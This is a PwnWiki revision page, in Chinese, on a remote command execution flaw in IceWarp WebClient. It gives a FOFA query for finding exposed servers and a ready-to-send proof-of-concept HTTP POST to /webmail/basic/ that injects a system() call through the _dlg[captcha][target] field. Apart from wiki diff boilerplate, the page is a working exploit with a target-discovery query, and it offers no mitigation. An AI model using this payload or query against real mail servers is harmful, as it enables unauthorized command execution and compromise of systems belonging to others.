Difference between revisions of "IceWarp WebClient basic 遠程命令執行漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> IceWarp WebClient ==FOFA== <pre> app="IceWarp-公司产品" </pre> ==POC== <pre> POST /webmail/basic/ HTTP/1.1 Host:...")
 
(Marked this version for translation)
 
Line 1: Line 1:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==漏洞影響==
+
==漏洞影響== <!--T:1-->
 
</translate>
 
</translate>
 
IceWarp WebClient
 
IceWarp WebClient

Latest revision as of 16:19, 20 June 2021

Other languages:

漏洞影響

IceWarp WebClient

FOFA

app="IceWarp-公司产品"

POC

POST /webmail/basic/ HTTP/1.1
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
Cookie: use_cookies=1
Content-Length: 43
_dlg[captcha][target]=system(\'ipconfig\')\